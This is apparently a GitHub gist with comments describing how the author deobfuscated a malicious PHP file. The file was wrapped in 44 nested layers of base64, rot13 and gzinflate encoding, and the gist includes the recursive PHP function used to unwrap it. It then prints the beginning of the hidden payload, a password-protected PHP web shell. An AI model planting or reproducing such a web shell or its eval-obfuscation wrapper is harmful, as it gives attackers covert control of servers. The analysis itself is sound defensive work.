Skip to content

Instantly share code, notes, and snippets.

Created September 19, 2011 22:34
What would you like to do?
Fighting inception obfuscation
// I got this file once
eval(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
// obviously I didn't want it to eval(), so to deobfuscate it i simply did:
print(gzinflate(str_rot13(base64_decode('HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=')))); ?>
$ php 2.php
$ oh crap
-bash: oh: command not found
$ php 2.php > 3.php
$ joe 3.php
$ php 3.php
Friggin inceptions! there might be many of them...
// and this is how you handle this
function t($code) {
echo "."; // just to detect how many inceptions there were
$code = str_rot13(base64_decode($code));
$code = gzinflate($code);
$m = array();
if (preg_match('/str_rot13\(base64_decode\(\'(.+)\'\)/', $code, $m)) {
return t($m[1]);
return $code;
$code = 'HJ3FkqzYAlI/52gEA9yGuHjikw7cNfGvf0w...60KB.of.code...z///Oe/7/W/fwE=';
$ php deception.php | head
............................................ // 44 inceptions!
@session_start();@set_time_limit(0);@$pass = $_POST['pass'];$chk_login = true;$password = "tampan";if($pass == $password){$_SESSION['nst'] = "$pass";}if($chk_login == true){if(!isset($_SESSION['nst']) or $_SESSION['nst'] != $password){die("<title>.::[ Yogyacarderlink Area ]::.</title><body style=margin:0px;><table border=0 cellpadding=0 cellspacing=0 width=100% height=100% bgcolor=black><tr><td valign=middle align=center><table cellpadding=2 cellspacing=2 width=100 bgcolor=black style='border:1px solid #FFFF00;'><tr><td><table width=100 bgcolor=black style='border:1px dashed #FFFF00;'><tr><td><form method=post><font size=1 face=verdana color=white><b><center>-:: Wellcome to Private sHell ::-</center></b><hr style='border:1px dashed #FFFF00;'><center><input type=password name=pass size=30><br><br><input type=submit value=GO style='background-color: #000000; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: #CCCCCC; border-right-color: #999999; border-bottom-color: #999999; border-left-color: #CCCCCC; color: #FFFFFF;'></center></form><b>Host :</b> ".$_SERVER["HTTP_HOST"]."<br><b>IP :</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br><b>Your IP :</b> ".$_SERVER["REMOTE_ADDR"]."</font></td></tr></table></tr></td></table></td></tr></table></body>");}}$language='eng';error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = "denzjhoena Private sHell";if(version_compare(phpversion(), '4.1.0') == -1){$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;$_SERVER = &$HTTP_SERVER_VARS;}if (@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}foreach ($_SERVER as $k=>$v){$_SERVER[$k] = stripslashes($v);}}
$head = '
<title>[ ? ] denzjhoena shell [ ? ]</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
tr {
Copy link

koto commented Sep 19, 2011

Of course, under 44 layers of obfuscation there was a PHP shell script...

Copy link

damianb commented Sep 19, 2011

so, that's 44 layers total, not including the two attempts at the beginning?

also, they didn't try to change the obfuscation methods throughout? that's surprising.

Copy link

koto commented Sep 20, 2011

yeah, 44 in total, all steps were the same.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment